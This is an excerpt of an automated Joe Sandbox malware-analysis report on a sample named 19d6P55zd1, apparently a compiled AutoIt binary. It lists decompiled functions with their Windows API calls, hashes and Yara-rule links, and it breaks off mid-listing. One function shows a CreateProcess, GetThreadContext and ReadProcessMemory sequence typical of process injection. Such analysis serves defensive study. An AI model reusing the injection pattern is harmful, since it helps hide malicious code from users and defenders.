                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __lock_file_memset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 26237723-0
                                                                                                                    • Opcode ID: 989993214ecee57d22ec879236e048784c4f72ebb568059c93cfc12218033af0
                                                                                                                    • Instruction ID: 4ca534697abeab273a0368a0153e7db36b06c2a8d9cb16fae78354154d0ddce5
                                                                                                                    • Opcode Fuzzy Hash: 989993214ecee57d22ec879236e048784c4f72ebb568059c93cfc12218033af0
                                                                                                                    • Instruction Fuzzy Hash: 4501F771C01A08EBCF13AFA99C0649E7BE1AF52321F424115F8241E192DB35AA11DF91
                                                                                                                    Function 003453A6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00348B28: __getptd_noexit.LIBCMT ref: 00348B28
                                                                                                                    • __lock_file.LIBCMT ref: 003453EB
                                                                                                                      • Part of subcall function 00346C11: __lock.LIBCMT ref: 00346C34
                                                                                                                    • __fclose_nolock.LIBCMT ref: 003453F6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2800547568-0
                                                                                                                    • Opcode ID: 55d086b2afbbc023401814b956cd71987e6ea3e38b576e9b89910556d2a9e6fe
                                                                                                                    • Instruction ID: 894e3c8e8be49aa4eeeab2e262c7743e639970889159af865771d2d32b638334
                                                                                                                    • Opcode Fuzzy Hash: 55d086b2afbbc023401814b956cd71987e6ea3e38b576e9b89910556d2a9e6fe
                                                                                                                    • Instruction Fuzzy Hash: 45F09031C01A049BDB13AF6598067AD66E06F42374F258209E464AF1C2CBBCA945AB52
                                                                                                                    Function 0123885D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 0123908D
                                                                                                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 012390B1
                                                                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 012390D3
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2165997295.0000000001237000.00000040.00000020.00020000.00000000.sdmp, Offset: 01237000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_1237000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2438371351-0
                                                                                                                    • Opcode ID: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                                                                                                    • Instruction ID: 75678b9cd4335497e1163b593544e9e7471d701c73778e47575dc4e68e3a6fbe
                                                                                                                    • Opcode Fuzzy Hash: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                                                                                                    • Instruction Fuzzy Hash: 2B12CE24E24658C6EB24DF64D8507DEB232EF68300F1094E9910DEB7A5E77A4F81CF5A
                                                                                                                    Function 00340C08 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ProtectVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 544645111-0
                                                                                                                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                    • Instruction ID: 2ba74b6b684ce91df8d56ae66197c4596bd600e6164a0878136b9d20a7f81d27
                                                                                                                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                    • Instruction Fuzzy Hash: 4931BD70B00105DBC71ADF58D4C4A69B7A6FB99300B6586A5E90ACF751DA31EDC1DB80
                                                                                                                    Function 0035FCAC Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClearVariant
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1473721057-0
                                                                                                                    • Opcode ID: 3c992abbebe634d35a3edd61e0c58054ce89b59f09e46f145690e9501b5a4038
                                                                                                                    • Instruction ID: 56c1b13845130ba43cc2fa543a6ac7d752282d975b17c51da76ac21fb1f93499
                                                                                                                    • Opcode Fuzzy Hash: 3c992abbebe634d35a3edd61e0c58054ce89b59f09e46f145690e9501b5a4038
                                                                                                                    • Instruction Fuzzy Hash: 204148746087518FDB26DF14D444B1ABBE0BF45314F0988ACE8998B362C331EC45CF52
                                                                                                                    Function 00324DDD Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00324BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00324BEF
                                                                                                                      • Part of subcall function 0034525B: __wfsopen.LIBCMT ref: 00345266
                                                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,003E52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00324E0F
                                                                                                                      • Part of subcall function 00324B6A: FreeLibrary.KERNEL32(00000000), ref: 00324BA4
                                                                                                                      • Part of subcall function 00324C70: _memmove.LIBCMT ref: 00324CBA
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Library$Free$Load__wfsopen_memmove
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1396898556-0
                                                                                                                    • Opcode ID: ba798c07bbd0623d607224c55ed823f1f1fd3498ed59e59c91136333b797ab7e
                                                                                                                    • Instruction ID: e6fcb033817dd715254fdaf4660bd796d41cb9081179ba99ab56154f82795c62
                                                                                                                    • Opcode Fuzzy Hash: ba798c07bbd0623d607224c55ed823f1f1fd3498ed59e59c91136333b797ab7e
                                                                                                                    • Instruction Fuzzy Hash: 5D110631600315ABDF27FFB0EC16FAD77A8AF84710F118829F981AF181EB719A049B51
                                                                                                                    Function 0035FD85 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClearVariant
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1473721057-0
                                                                                                                    • Opcode ID: 05c4cee017ec5923ee575e16969cd9b53ec67e2f0f18338fb80f8bc797a33374
                                                                                                                    • Instruction ID: 82675bfbe667b05e424cadacb097699a7e3541ae14bde1b1b23f9f4bf623b84b
                                                                                                                    • Opcode Fuzzy Hash: 05c4cee017ec5923ee575e16969cd9b53ec67e2f0f18338fb80f8bc797a33374
                                                                                                                    • Instruction Fuzzy Hash: B6213374608711DFCB16DF64D444B1ABBE0BF88314F05886CF98A8B722C731E805CB92
                                                                                                                    Function 00344863 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __lock_file.LIBCMT ref: 003448A6
                                                                                                                      • Part of subcall function 00348B28: __getptd_noexit.LIBCMT ref: 00348B28
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __getptd_noexit__lock_file
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2597487223-0
                                                                                                                    • Opcode ID: fa10aa41711a10c73a33d43e5b9ddc67fd0d959d943d590f08a2faf6bc597413
                                                                                                                    • Instruction ID: f4271d347bd5d0b756d5f55c4468c6af088150fc3f7a28608d9b7f616cce3688
                                                                                                                    • Opcode Fuzzy Hash: fa10aa41711a10c73a33d43e5b9ddc67fd0d959d943d590f08a2faf6bc597413
                                                                                                                    • Instruction Fuzzy Hash: A4F0C231901609EBDF13AFB48C067EE36E0EF01325F158424F424AE192CB79E951DF51
                                                                                                                    Function 00324E4A Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • FreeLibrary.KERNEL32(?,?,003E52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00324E7E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FreeLibrary
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3664257935-0
                                                                                                                    • Opcode ID: a4befdbb24f6a4f2915b72cf18347ec70e547d0583ea2ee22dd435ae48e8df7b
                                                                                                                    • Instruction ID: 9e85b9a87ff5f690dd6fd56476d80a2e51766f85a3d6179859d7b5f74e03465e
                                                                                                                    • Opcode Fuzzy Hash: a4befdbb24f6a4f2915b72cf18347ec70e547d0583ea2ee22dd435ae48e8df7b
                                                                                                                    • Instruction Fuzzy Hash: 8DF03971501721CFEB369F64E494812BBE5FF143293228A3EE2D786A20C732A880DF40
                                                                                                                    Function 00340791 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 003407B0
                                                                                                                      • Part of subcall function 00327BCC: _memmove.LIBCMT ref: 00327C06
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LongNamePath_memmove
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2514874351-0
                                                                                                                    • Opcode ID: d6bbb8f5276b244c08a1a958e3b1bac18097d1bfbd19636f370309e359f69fd8
                                                                                                                    • Instruction ID: 3d5ff605e6cb395dcdc24aa4954789d7c7a3ed7c8ec0d403febaf3552c2e2b20
                                                                                                                    • Opcode Fuzzy Hash: d6bbb8f5276b244c08a1a958e3b1bac18097d1bfbd19636f370309e359f69fd8
                                                                                                                    • Instruction Fuzzy Hash: ABE0CD369051285BC721D6989C05FEA77DDEFC97A1F0441B5FC0CD7214D9609C8086D0
                                                                                                                    Function 00388E9F Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __fread_nolock
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2638373210-0
                                                                                                                    • Opcode ID: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                                                                                                                    • Instruction ID: aebebc618746934b1d2273a0e579d749470ba70b2c9e544554c8d35d98dfc82a
                                                                                                                    • Opcode Fuzzy Hash: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                                                                                                                    • Instruction Fuzzy Hash: F5E092B0504B045BD7399B28D800BA373E1AB06304F00085DF2AA97242EB6278418759
                                                                                                                    Function 0034525B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __wfsopen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 197181222-0
                                                                                                                    • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                                                    • Instruction ID: 49858897f0976a2f7bc4b12814aafdd92efd74a11891ba1b3966d276c8ab4d7f
                                                                                                                    • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                                                    • Instruction Fuzzy Hash: 17B0927684020C77CE022A82EC02A493B699B41764F408021FB0C1C162A6B3A6649A89
                                                                                                                    Function 01239860 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • Sleep.KERNELBASE(000001F4), ref: 01239871
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2165997295.0000000001237000.00000040.00000020.00020000.00000000.sdmp, Offset: 01237000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_1237000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Sleep
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3472027048-0
                                                                                                                    • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                    • Instruction ID: c51c4f0863699a6956d81b6683dca2003bfdbf5686560a724daba2f1e5836bf5
                                                                                                                    • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                    • Instruction Fuzzy Hash: CDE0BF7494410DDFDB00EFA4D54969E7BB4EF44301F100261FD0192281D67099508A62

                                                                                                                    Non-executed Functions

                                                                                                                    Function 003ACABC Relevance: 75.9, APIs: 40, Strings: 3, Instructions: 632windowkeyboardCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00322612: GetWindowLongW.USER32(?,000000EB), ref: 00322623
                                                                                                                    • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 003ACB37
                                                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 003ACB95
                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 003ACBD6
                                                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 003ACC00
                                                                                                                    • SendMessageW.USER32 ref: 003ACC29
                                                                                                                    • _wcsncpy.LIBCMT ref: 003ACC95
                                                                                                                    • GetKeyState.USER32(00000011), ref: 003ACCB6
                                                                                                                    • GetKeyState.USER32(00000009), ref: 003ACCC3
                                                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 003ACCD9
                                                                                                                    • GetKeyState.USER32(00000010), ref: 003ACCE3
                                                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 003ACD0C
                                                                                                                    • SendMessageW.USER32 ref: 003ACD33
                                                                                                                    • SendMessageW.USER32(?,00001030,?,003AB348), ref: 003ACE37
                                                                                                                    • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 003ACE4D
                                                                                                                    • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 003ACE60
                                                                                                                    • SetCapture.USER32(?), ref: 003ACE69
                                                                                                                    • ClientToScreen.USER32(?,?), ref: 003ACECE
                                                                                                                    • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 003ACEDB
                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 003ACEF5
                                                                                                                    • ReleaseCapture.USER32 ref: 003ACF00
                                                                                                                    • GetCursorPos.USER32(?), ref: 003ACF3A
                                                                                                                    • ScreenToClient.USER32(?,?), ref: 003ACF47
                                                                                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 003ACFA3
                                                                                                                    • SendMessageW.USER32 ref: 003ACFD1
                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 003AD00E
                                                                                                                    • SendMessageW.USER32 ref: 003AD03D
                                                                                                                    • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 003AD05E
                                                                                                                    • SendMessageW.USER32(?,0000110B,00000009,?), ref: 003AD06D
                                                                                                                    • GetCursorPos.USER32(?), ref: 003AD08D
                                                                                                                    • ScreenToClient.USER32(?,?), ref: 003AD09A
                                                                                                                    • GetParent.USER32(?), ref: 003AD0BA
                                                                                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 003AD123
                                                                                                                    • SendMessageW.USER32 ref: 003AD154
                                                                                                                    • ClientToScreen.USER32(?,?), ref: 003AD1B2
                                                                                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 003AD1E2
                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 003AD20C
                                                                                                                    • SendMessageW.USER32 ref: 003AD22F
                                                                                                                    • ClientToScreen.USER32(?,?), ref: 003AD281
                                                                                                                    • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 003AD2B5
                                                                                                                      • Part of subcall function 003225DB: GetWindowLongW.USER32(?,000000EB), ref: 003225EC
                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 003AD351
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                                                    • String ID: @GUI_DRAGID$F$pb>
                                                                                                                    • API String ID: 3977979337-3272271458
                                                                                                                    • Opcode ID: ecd3715ec57adcfe00dac7c152f84aae1caa3d2021e0583edd4889d4fb079d87
                                                                                                                    • Instruction ID: dc1c31cd1adf2524320e109e7e3e789939c76993baa9172550370a678b6e4b55
                                                                                                                    • Opcode Fuzzy Hash: ecd3715ec57adcfe00dac7c152f84aae1caa3d2021e0583edd4889d4fb079d87
                                                                                                                    • Instruction Fuzzy Hash: 0042B078204341AFDB26CF64C884FAABBE9FF4A314F151619F5558B2B0C731D850DBA1
                                                                                                                    Function 00336F9E Relevance: 55.8, APIs: 19, Strings: 10, Instructions: 5018COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memmove$_memset
                                                                                                                    • String ID: ]=$3c3$DEFINE$P\=$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$_3
                                                                                                                    • API String ID: 1357608183-732045844
                                                                                                                    • Opcode ID: d27710b9c0e09c0c944ac48633f846186f9eb00f4d00d5e5cf48584ba0a1d809
                                                                                                                    • Instruction ID: 169a5819f3409f258fdc8df0cdbac62047a707da5a1d75bbdc859fda353def15
                                                                                                                    • Opcode Fuzzy Hash: d27710b9c0e09c0c944ac48633f846186f9eb00f4d00d5e5cf48584ba0a1d809
                                                                                                                    • Instruction Fuzzy Hash: AD93A275E04219DFDB36CF98C881BADB7B1FF48310F25816AE949AB281E7749D81DB40
                                                                                                                    Function 003248D7 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetForegroundWindow.USER32(00000000,?), ref: 003248DF
                                                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0035D665
                                                                                                                    • IsIconic.USER32(?), ref: 0035D66E
                                                                                                                    • ShowWindow.USER32(?,00000009), ref: 0035D67B
                                                                                                                    • SetForegroundWindow.USER32(?), ref: 0035D685
                                                                                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0035D69B
                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0035D6A2
                                                                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 0035D6AE
                                                                                                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 0035D6BF
                                                                                                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 0035D6C7
